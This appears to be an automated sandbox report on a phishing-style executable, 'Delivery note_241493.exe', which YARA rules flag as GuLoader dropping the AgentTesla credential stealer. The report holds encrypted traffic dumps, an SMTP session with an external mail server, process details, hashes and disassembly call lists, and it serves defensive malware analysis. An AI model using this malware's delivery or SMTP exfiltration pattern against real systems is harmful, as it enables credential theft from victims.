                                2021-10-13 14:54:49 UTC210INData Raw: 85 19 b8 c9 3c a8 9a da a2 b1 77 a8 2a 09 98 ee 75 6d ef 10 be 1c 0e d9 f0 ac a1 68 e2 f0 a6 44 ac 9f c8 72 64 fd bc f2 67 42 58 0a 5a 0d a0 67 ef 13 39 55 58 bb a6 35 3e 7f 8c e4 63 f9 2f 2b 4a 12 2a cf b5 8b 30 fb 9c 3b a4 94 ac d5 d9 70 2b 70 32 ee 62 16 ae 23 ae 6d 8b 76 0a bb 45 8a d2 fe 5e bf 7d 8d 50 b1 c0 41 be 2b bc ff 1b a4 38 98 f9 ac 11 73 35 24 19 c5 82 0b 41 e2 3f bb 64 d3 6c b2 38 75 39 86 c6 2a e6 4e 3b 9a 93 c3 ee e2 74 9c f8 c6 93 df 21 9f 95 05 2f fd 52 4a c8 75 1b 8b 61 72 bf f3 b8 d9 4d dc 78 13 20 20 e4 3a a5 45 cb 64 76 17 b6 d9 1d ad ce 0b 40 72 87 ee d1 11 9f a6 26 d8 27 c6 ab 95 75 0c 20 b9 58 e5 46 f6 7b 74 ac 0c 99 e8 23 8b e5 c1 4e 62 fd b8 d2 b8 6f 7c 9f 97 fa 4a 83 69 15 e6 13 cc 9a 47 c8 27 51 6f 84 5a 15 5b 42 b5 cf c5 c6
                                Data Ascii: <w*umhDrdgBXZg9UX5>c/+J*0;p+p2b#mvE^}PA+8s5$A?dl8u9*N;t!/RJuarMx :Edv@r&'u XF{t#Nbo|JiG'QoZ[B
                                2021-10-13 14:54:49 UTC212INData Raw: a5 b2 9e 77 fd b9 83 24 1b 5c e9 bd c1 71 3b 3f c6 e3 1d 86 7f d2 b4 45 50 9b 71 df 18 c0 b1 72 b7 2a 17 c3 f7 a6 49 c5 90 f7 25 3e 67 8e 50 d6 9c 42 4c 97 90 0c 79 bc 7b aa 66 78 fe f9 83 4a df 06 f2 8a bd 3b 0f ec c6 72 01 61 a3 10 35 85 5a 3a bf c9 0e b6 79 43 d3 b0 f0 fd f9 17 11 44 d1 c9 33 55 59 dd 7a 1b 78 82 61 c1 f3 0d d3 a3 2f 50 a3 c0 25 28 9e b4 c8 10 a7 96 6b d0 48 81 68 8b 96 3d 8a 75 c5 b7 fb f3 f8 f2 a8 14 7e b7 88 64 10 72 ae 41 3b bb 94 83 0b 74 f3 c5 fc 57 0a 00 c1 1f cf 7b 18 08 d6 5e 5e 23 43 c5 d3 6c 98 b1 ca 82 44 90 2c 0d d1 70 81 c9 7a 55 bc c0 45 6a 07 a6 52 80 ca 96 3f 8f 8f c1 a3 99 ac 74 7c e9 2f 5e 48 a5 a3 d3 a7 99 dc 32 77 1f c0 c0 22 19 ec d2 e8 d9 6d 7a 55 98 c0 f0 4b 0f 1f e2 35 52 26 94 6f 83 2c b9 90 90 be a7 28 c1 03
                                Data Ascii: w$\q;?EPqr*I%>gPBLy{fxJ;ra5Z:yCD3UYzxa/P%(kHh=u~drA;tW{^^#ClD,pzUEjR?t|/^H2w"mzUK5R&o,(
                                2021-10-13 14:54:49 UTC213INData Raw: 67 df e5 03 92 29 5e 39 ed 0b 71 8b 5b a6 f0 30 17 5c 40 ee 69 24 7a e8 3a e1 7e 4b 54 1f fd c6 20 d3 ac c1 e1 4a 8a 00 11 f6 39 f5 56 02 23 86 6c e1 37 3d 9d 15 7f 96 03 61 6e d7 3d 5c 84 21 46 4c 4c 5d a7 13 e4 99 d8 86 ea c9 0b 9d 42 d4 ba db a6 b2 be a7 a9 be 24 24 6f ed 2f 52 c4 af a7 9f 06 3e 43 6e df ce 04 8f ac f6 08 ac e0 29 cf 56 3b 92 e1 dc e7 96 36 5f c2 6c da 41 7f fd 89 cd 80 cd d3 79 9b fd 7d a0 61 65 1e a8 a7 d0 d3 ae 34 b4 3b f2 57 7d 57 28 11 b8 58 de 29 b2 63 80 a0 5e 16 97 8d 79 48 64 aa 9c 97 81 de cf 34 e3 da 17 c9 ea 67 a5 ca ba 58 a7 87 f1 4b 17 4c de bc dd 02 ee c0 cc 56 74 1e 5b d4 b8 88 d4 d8 15 45 02 19 af 4a fe f2 a6 bb b5 30 76 64 dc c1 b1 ec 84 e2 48 2a c1 c5 b4 3e 27 e5 2b 89 f8 69 d9 14 49 12 e9 cf 0c 1f e2 fc ee 55 07 3b
                                Data Ascii: g)^9q[0\@i$z:~KT J9V#l7=an=\!FLL]B$$o/R>Cn)V;6_lAy}ae4;W}W(X)c^yHd4gXKLVt[EJ0vdH*>'+iIU;
                                2021-10-13 14:54:49 UTC214INData Raw: f6 b7 1c 83 17 9c e8 3c b2 15 2e ac aa 66 b8 a5 9e 8b 7d c1 25 fb 00 38 85 0c c3 79 fc a1 72 8e cf a3 59 a1 99 db 7f 73 ff a2 fb 68 4f 4b 15 c9 b5 e8 6c c7 19 34 5e 42 d7 ae 2a 3e 79 8a e6 6c f8 0d 39 32 19 31 dd d3 9f 1b f2 91 32 aa 98 b9 c2 49 f5 ee 61 27 d2 65 84 df b4 b3 6d 8a e3 0d 29 15 01 53 39 cd 7f ac 91 37 ae 4f 76 ab 37 39 bf 08 c3 38 99 d9 af 1e 6f a5 7a 36 d6 84 04 45 71 5b 27 65 c3 e3 fa 24 17 30 90 da b6 71 47 2c 3b d3 df 7d 8a 37 92 f6 dd 8e ce a0 26 8f 19 bb 72 d8 47 ca 7a 1d 86 75 f0 0f f3 ab d2 40 d2 72 17 2e 23 e3 26 bd 5b cf 71 77 02 bb cc 17 82 c6 08 40 75 8f fb df 00 9b ba ba 40 32 c5 b7 85 ff 21 2c a3 35 f8 5b dd 74 75 a2 1e 83 60 b3 97 f2 52 8f ea e7 30 53 b8 68 ec d8 80 fa 4d 8d 0e 1a 6e 41 bb fa 47 dd 3b c2 73 2d 7f 12 51 5e c5
                                Data Ascii: <.f}%8yrYshOKl4^B*>yl9212Ia'em)S97Ov798oz6Eq['e$0qG,;}7&rGzu@r.#&[qw@u@2!,5[tu`R0ShMnAG;s-Q^
                                2021-10-13 14:54:49 UTC215INData Raw: 0c 9d 67 98 b7 87 df a3 a1 96 37 8b 45 08 bd c2 64 33 25 c7 f4 0d 0f ee da a6 c0 12 94 f4 77 0d d5 ab 11 be 27 1d d8 f7 a6 90 d6 1f ef 22 24 61 97 d9 05 8a dd 14 82 90 31 7c a5 fe cb 6f 65 f9 e9 0d 8f fe 83 bd 82 a8 28 9f f5 13 6e 86 21 b7 03 a6 9d ba 2c 1e 88 1d 2a ee 71 52 20 ec 6e 98 80 0d 4b de c9 30 70 41 c7 6f 8a 69 6a 6d 53 a7 81 cb b7 2e 44 ac 40 77 0d bf a8 d2 8d 33 88 6d f5 59 1c 9a 19 86 f9 83 72 c2 25 b2 78 79 20 21 53 6f ad 14 f8 0c 65 27 04 35 a7 87 88 07 74 fa d1 60 12 0c 13 d6 6b d7 65 15 04 58 ae 5f 2e 57 c5 d0 a8 97 af 4b c6 4c 87 bc 14 0c 73 80 5d 7a 53 b8 db 4f 79 10 3a 66 8f 4e cb 34 99 06 f0 a3 c4 a0 7b 78 e9 26 53 4d 10 2b d4 81 88 e6 49 5d 3f cb d5 12 0b f7 ee f7 d7 45 76 53 98 c7 f0 44 00 9a 35 35 54 09 95 6b 0c 18 be 98 82 a0 a4
                                Data Ascii: g7Ed3%w'"$a1|oe(n!,*qR nK0pAoijmS.D@w3mYr%xy !Soe'5t`keX_.WKLs]zSOy:fN4{x&SM+I]?EvSD55Tk
                                2021-10-13 14:54:49 UTC217INData Raw: 30 44 c9 4f c6 f2 82 e3 29 5d a9 ee 0b 70 9b cb c2 88 23 02 dc 5b 6c b8 ad 56 c6 3c d3 ff 99 d0 e2 f2 c3 12 52 70 db e9 4c 9c 0a 8d 22 2d 57 88 1f 31 96 78 f1 1f 30 98 1b 76 9d 15 6d 4a d0 2e c6 dd 26 67 48 55 4b 25 4f e2 87 fc 87 ea c7 90 3b 40 f1 af db a4 82 b6 95 2a ec a8 b7 73 7d e7 42 cc 8d b0 8c 9a b5 c2 b4 56 8b 0d 80 ac 70 ee b1 d2 a9 44 d6 c8 01 23 5d f3 9f 34 34 c4 7f c9 4d 77 f0 86 42 6f c1 d0 79 37 c1 13 a0 f4 97 97 2d ba de 5a e6 01 a4 b2 76 53 62 c1 97 bd 26 43 d9 ba 73 f4 8f b3 55 16 8b 10 d7 58 03 aa 9c 97 8f 4d 0e bb 82 dc 02 cf ec 43 ac d9 ac 42 3b 10 ed 5a 8b 0f de bf dd 3e ee c0 d1 43 d5 85 58 c8 28 4b a7 c2 29 4a 1e 85 37 4a e4 e0 cd ac aa a1 db 76 d2 d4 32 5f 03 16 49 a5 74 cc aa 02 30 f3 2e 95 69 ed dd 17 cf 5e f4 c1 85 8e eb f0 f3
                                Data Ascii: 0DO)]p#[lV<RpL"-W1x0vmJ.&gHUK%O;@*s}BVpD#]44MwBoy7-ZvSb&CsUXMCB;Z>CX(K)J7Jv2_It0.i^
                                2021-10-13 14:54:49 UTC218INData Raw: 4d fd 3a fe c3 1f e4 1f f6 c8 4f ba 74 1b de b1 07 aa 41 07 f8 6f 6e 65 8d 12 d6 1c 60 d1 d7 bc cb 60 8a d2 d3 44 db 97 e8 7c 1a fc c5 f5 12 41 26 1b a9 34 c7 62 a5 11 52 5d 33 be d2 37 1e 71 eb ee 16 fc 4a 39 00 1a 43 dd bf 83 67 fc ef 35 d8 9a de d0 bc f0 95 7e 45 de 02 96 71 2d 8b 7f 25 a3 2d 3b ba 98 61 2b 63 3f d0 9f 56 a0 33 78 8e 25 cf ff 73 aa 5e 9e ea ad 22 61 99 f9 2f e5 ad 0a 64 63 f4 be 57 d1 4c ba 00 73 10 85 b2 37 81 46 4e ba 9b d6 6a 16 72 80 f0 d0 93 db 02 96 8f 1f a6 67 59 5c ad 7c 0e 81 01 7b b9 f4 ad c0 54 ce 13 07 35 3a ea 32 af 55 50 9c 71 0c cf c2 9f 63 da 18 c8 97 95 6b 79 2f 80 a6 a9 4b 21 c8 a5 85 fc 25 3e a3 dd d4 55 7d 96 6b 2e be 99 fd 38 15 05 c1 4d 4a e7 30 6b a4 66 70 84 8f 75 e2 97 20 09 fd 83 68 9d 54 c7 24 d8 ee 90 42 10
                                Data Ascii: M:OtAone``D|A&4bR]37qJ9Cg5~Eq-%-;a+c?V3x%s^"a/dcWLs7FNjrgY\|{T5:2UPqcky/K!%>U}k.8MJ0kfpu hT$B
                                2021-10-13 14:54:49 UTC219INData Raw: e9 a1 40 88 91 7b ec af 93 e8 b8 ac 81 2c 0a df 07 b2 46 39 38 25 c7 ee 18 89 6a de a9 44 4e 94 1d ca 0c cd a5 65 b2 23 15 d5 f8 22 cd c1 83 fa 31 3c 60 99 c1 83 92 c4 ee 60 6a d3 7d a4 f9 cb 6e 7c f6 fb 8d 5a c9 8f af 8c bd 3e 12 6c 12 7c 03 67 b3 90 07 00 df 3e 9f c8 0b ba 58 63 d2 b4 e5 7f 1a 13 13 4d d0 df b0 2d 4c d2 65 02 f1 42 73 40 3a 15 cb ae 2e 5d b6 45 75 2f bc b7 c2 05 a9 93 79 54 1d 02 9b 99 04 dd 97 7f d0 30 30 ef 69 b2 40 1b 7d bf 97 6f 1c f7 46 4a 3f bc 98 07 59 7c f4 c0 ef 5a 0a 15 c7 05 cb 6e 14 19 54 8b 4a a1 47 c6 d5 28 9e bc ca 8e 59 95 3d 8d 0d 7f 00 1d 75 5d e2 c5 57 20 70 da 27 d3 a0 e5 7f f3 e4 a4 c1 d9 c1 13 12 af 7b 2f 30 52 50 d1 88 89 f4 14 68 7c fc fe 12 32 92 fd d8 f4 40 19 69 bd f4 95 79 22 37 8d 0f 3d 39 be 49 b5 55 89 f8
                                Data Ascii: @{,F98%jDNe#"1<``j}n|Z>l|g>XcM-LeBs@:.]Eu/yT00i@}oFJ?Y|ZnTJG(Y=u]W p'{/0RPh|2@iy"7=9IU
                                2021-10-13 14:54:49 UTC221INData Raw: c0 aa 93 0f 4c a0 6f aa e0 66 92 3b dc bb e8 5e 71 fa d9 27 f9 40 05 b2 49 a0 78 ea 53 b1 3c b1 7f 3f d6 a4 f3 ac 00 85 b0 95 ee 0c 81 52 0d a8 2b 3b 8b 79 3f f5 70 b3 3f 4f 99 44 7e fe 1b 2f 4e a6 3c 17 80 58 47 64 54 3c a7 6a ea e4 dc 86 eb fd 13 90 45 d0 af 85 27 4e bf d2 28 9f 2a 46 61 bc 46 31 c4 dd b2 f4 87 d5 42 15 5e e9 0a e9 be 85 0f b9 f2 88 56 57 29 7f a1 e2 e9 99 24 79 ca 03 d4 21 7f 99 94 aa 8e ad c2 9a 62 bf 7a f7 74 1e 9f 5d a6 a7 52 80 21 c7 ba 06 56 16 42 3a 90 42 59 b9 a8 91 6d ea bd 3e 18 e9 0d 95 5a 42 a2 c5 99 e3 5f e9 26 ec d2 64 c7 b5 4b ea c4 ee 4a 6c 1e b2 59 da 0c ac ae 37 9b a5 ce a3 44 a4 87 37 c6 73 c8 aa c4 5a 4b 75 04 84 56 87 e0 b7 ae c1 b1 d3 65 e6 d3 38 4d 83 f7 09 ab 16 c4 d5 0c 44 f1 4b 9b 1a f0 ac 06 9e 52 99 dd ff 86
                                Data Ascii: Lof;^q'@IxS<?R+;y?p?OD~/N<XGdT<jE'N(*FaF1B^VW)$y!bzt]R!VB:BYm>ZB_&dKJlY7D7sZKuVe8MDKR
                                2021-10-13 14:54:49 UTC222INData Raw: d3 83 b8 22 fd 54 fe aa 1f 8b 1f 98 c8 3d ba 1b 1b ab b1 73 aa 24 07 8a 6f 40 65 ee 12 b9 1c 0d d1 f8 bc af 60 e3 d2 a0 44 af 97 c6 7c 6e fc aa f5 60 41 56 1b db 34 a8 62 cf 11 37 5d 50 be a6 37 30 71 84 ee 64 fc 2d 39 2f 1a 37 dd d0 83 15 fc 8d 35 aa 9a b1 d0 cb f0 e6 7e 20 de 70 96 5e 2d b2 7f 0b a3 18 3b 94 98 52 2b 4c 3f a4 9f 39 a0 41 78 a3 25 b8 ff 1a aa 30 9e d9 ad 10 61 b4 f9 1f e5 83 0a 50 63 da be 64 d1 62 ba 36 73 3e 85 c8 37 e8 46 3e ba 93 d1 6f 0b 77 9c f8 de 9b df 22 97 8d 17 ae 60 5a 4e c8 74 13 93 64 72 be f1 a5 dc 48 dc 7a 1a 29 29 ed 3a a1 47 d3 79 7f 1e a6 d0 1f 87 c6 0a 48 7b 87 ea d8 09 87 b4 a7 45 2f c0 ab 97 7d 14 30 b1 5c e5 47 fe 73 79 ac 0b 91 e1 2a 96 e0 d3 cf ff f5 b1 ca b9 7a 6d 98 9d f4 43 91 00 08 ef 01 a9 93 4f c0 35
                                Data Ascii: "T=s$o@e`D|n`AV4b7]P70qd-9/75~ p^-;R+L?9Ax%0aPcdb6s>7F>ow"`ZNtdrHz)):GyH{E/}0\Gsy*zmCO5


                                SMTP Packets

                                TimestampSource PortDest PortSource IPDest IPCommands
                                Oct 13, 2021 16:56:24.990811110 CEST58749776185.111.89.226192.168.11.20220-cpanel32.tarhelypark.hu ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 16:56:24 +0200
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                                Oct 13, 2021 16:56:24.991367102 CEST49776587192.168.11.20185.111.89.226EHLO 134349
                                Oct 13, 2021 16:56:25.010266066 CEST58749776185.111.89.226192.168.11.20250-cpanel32.tarhelypark.hu Hello 134349 [102.129.143.96]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPE_CONNECT
                                250-STARTTLS
                                250 HELP
                                Oct 13, 2021 16:56:25.010556936 CEST49776587192.168.11.20185.111.89.226STARTTLS
                                Oct 13, 2021 16:56:25.030911922 CEST58749776185.111.89.226192.168.11.20220 TLS go ahead

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Start time:16:54:17
                                Start date:13/10/2021
                                Path:C:\Users\user\Desktop\Delivery note_241493.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Delivery note_241493.exe'
                                Imagebase:0x400000
                                File size:98304 bytes
                                MD5 hash:261B89797CB2864AFEB6F968106B42C9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Visual Basic
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.4961833687.0000000002380000.00000040.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:16:54:33
                                Start date:13/10/2021
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Delivery note_241493.exe'
                                Imagebase:0x10000
                                File size:65440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.9684524385.000000001D641000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:moderate

                                General

                                Start time:16:54:33
                                Start date:13/10/2021
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff680e50000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Start time:16:56:47
                                Start date:13/10/2021
                                Path:C:\Windows\System32\oobe\UserOOBEBroker.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
                                Imagebase:0x7ff610760000
                                File size:57856 bytes
                                MD5 hash:BCE744909EB87F293A85830D02B3D6EB
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Executed Functions

                                  APIs
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 004137B9
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004137D8
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000000F8), ref: 004137FE
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413817
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413830
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000001B4), ref: 004138E0
                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004138F0
                                  • #606.MSVBVM60(00000001,?), ref: 0041390D
                                  • __vbaStrMove.MSVBVM60 ref: 00413918
                                  • __vbaStrCmp.MSVBVM60(00410B8C,00000000), ref: 0041392A
                                  • __vbaFreeStr.MSVBVM60 ref: 00413939
                                  • __vbaFreeVar.MSVBVM60 ref: 00413948
                                  • #706.MSVBVM60(00000001,00000000,00000000), ref: 00413959
                                  • __vbaStrMove.MSVBVM60 ref: 00413964
                                  • __vbaNew2.MSVBVM60(00410B38,00415590), ref: 0041397D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,02C5004C,00410B28,00000014), ref: 004139A2
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410B48,00000070), ref: 004139C9
                                  • __vbaFreeObj.MSVBVM60 ref: 004139D2
                                  • #580.MSVBVM60(Stalakitter,00000001), ref: 004139DF
                                  • #574.MSVBVM60(00000002), ref: 004139F7
                                  • __vbaStrMove.MSVBVM60 ref: 00413A02
                                  • __vbaStrCmp.MSVBVM60(00410BB0,00000000), ref: 00413A0E
                                  • __vbaFreeStr.MSVBVM60 ref: 00413A1D
                                  • __vbaFreeVar.MSVBVM60 ref: 00413A26
                                  • #594.MSVBVM60(00000002), ref: 00413A41
                                  • __vbaFreeVar.MSVBVM60 ref: 00413A4A
                                  • #648.MSVBVM60(00000002), ref: 00413A56
                                  • __vbaFreeVar.MSVBVM60 ref: 00413A5F
                                  • __vbaVarDup.MSVBVM60 ref: 00413A7B
                                  • #666.MSVBVM60(?,00000002), ref: 00413A89
                                  • __vbaVarMove.MSVBVM60 ref: 00413A95
                                  • __vbaFreeVar.MSVBVM60 ref: 00413A9E
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413ADA
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413AF3
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,000000F8), ref: 00413B1D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410768,000006F8), ref: 00413B54
                                  • __vbaFreeObj.MSVBVM60 ref: 00413B5D
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413B76
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413B8F
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,00000130), ref: 00413BB6
                                  • __vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 00413BC8
                                  • __vbaStrVarMove.MSVBVM60(00000000), ref: 00413BD2
                                  • __vbaStrMove.MSVBVM60 ref: 00413BDD
                                  • __vbaFreeStr.MSVBVM60 ref: 00413C04
                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00413C14
                                  • __vbaFreeVar.MSVBVM60 ref: 00413C20
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 00413C35
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413C4E
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B58,00000078), ref: 00413C78
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410768,000006FC), ref: 00413CC9
                                  • __vbaFreeObj.MSVBVM60 ref: 00413CCE
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401140,00410738,000002B4), ref: 00413CEF
                                  • __vbaVarAdd.MSVBVM60(00000002,?,?), ref: 00413D1D
                                  • __vbaVarMove.MSVBVM60 ref: 00413D24
                                  • #598.MSVBVM60 ref: 00413D2A
                                  • __vbaVarTstLt.MSVBVM60(00000002,?), ref: 00413D48
                                  • __vbaFreeVar.MSVBVM60(00413DB2), ref: 00413DA1
                                  • __vbaFreeStr.MSVBVM60 ref: 00413DA6
                                  • __vbaFreeVar.MSVBVM60 ref: 00413DAF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckHresult$Move$New2$List$#574#580#594#598#606#648#666#706CallLate
                                  • String ID: $Mallorcinerens$Stalakitter$zk:K&6
                                  • API String ID: 1003127262-3539258339
                                  • Opcode ID: 4ee836e66e67fe7a3d20d58613b89ca21674bdb90a833fef1b9fe981fe1506ea
                                  • Instruction ID: 46ed052b93a6bb8345fd2eb8abfcaccdc0eb1c5d8c453063ec2ff4699f824f55
                                  • Opcode Fuzzy Hash: 4ee836e66e67fe7a3d20d58613b89ca21674bdb90a833fef1b9fe981fe1506ea
                                  • Instruction Fuzzy Hash: 43125D70A00219DFDB10DFA4DD88BDEBBB8FF48705F10816AE549A7260DB746A85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: #100
                                  • String ID: VB5!6"*
                                  • API String ID: 1341478452-2992194029
                                  • Opcode ID: 9830079f2084ecabd5060d384f2ebbd2452fe1a239eebc6f433796d33b7854da
                                  • Instruction ID: 4da29fe75caf513d0de041a0abad8a40b6fdb82cfd961951f00eecbf0d196a61
                                  • Opcode Fuzzy Hash: 9830079f2084ecabd5060d384f2ebbd2452fe1a239eebc6f433796d33b7854da
                                  • Instruction Fuzzy Hash: A841A8A644E3C15FD303977498692807FB0AE23258B1E42EBC4C1DF5F3E6695D0AD726
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                  • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                                  • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                                  • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                  • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                                  • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                                  • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4960242033.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000001.00000002.4960212567.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960381894.0000000000415000.00000004.00020000.sdmp Download File
                                  • Associated: 00000001.00000002.4960412835.0000000000416000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                  • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                                  • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                                  • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.4961833687.0000000002380000.00000040.00000001.sdmp, Offset: 02380000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6852e4fa003d62f3ee907b9a0a21e079dbab2f3695ffece913874e84ac34679
                                  • Instruction ID: 8fb54290effd1689d849a658232abb7a02466ef306f84a87afadb8eeca92bc9c
                                  • Opcode Fuzzy Hash: c6852e4fa003d62f3ee907b9a0a21e079dbab2f3695ffece913874e84ac34679
                                  • Instruction Fuzzy Hash: 02B0123D18EED0DCF713515841402437F51AC5F20474816FDC1C5872EFC001249853C4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • #685.MSVBVM60 ref: 00413302
                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00413313
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00410B68,0000001C), ref: 00413330
                                  • __vbaFreeObj.MSVBVM60 ref: 00413348
                                  • __vbaNew2.MSVBVM60(00410B38,00415590), ref: 00413369
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,02C5004C,00410B28,00000014), ref: 0041338E
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410B48,000000D0), ref: 004133B8
                                  • __vbaStrMove.MSVBVM60 ref: 004133CD
                                  • __vbaFreeObj.MSVBVM60 ref: 004133D2
                                  • #539.MSVBVM60(?,00000001,00000001,00000001), ref: 004133E2
                                  • __vbaStrVarMove.MSVBVM60(?), ref: 004133EC
                                  • __vbaStrMove.MSVBVM60 ref: 004133F7
                                  • __vbaFreeVar.MSVBVM60 ref: 004133FC
                                  • #568.MSVBVM60(00000063), ref: 00413404
                                  • __vbaNew2.MSVBVM60(00410D20,00415010), ref: 0041341D
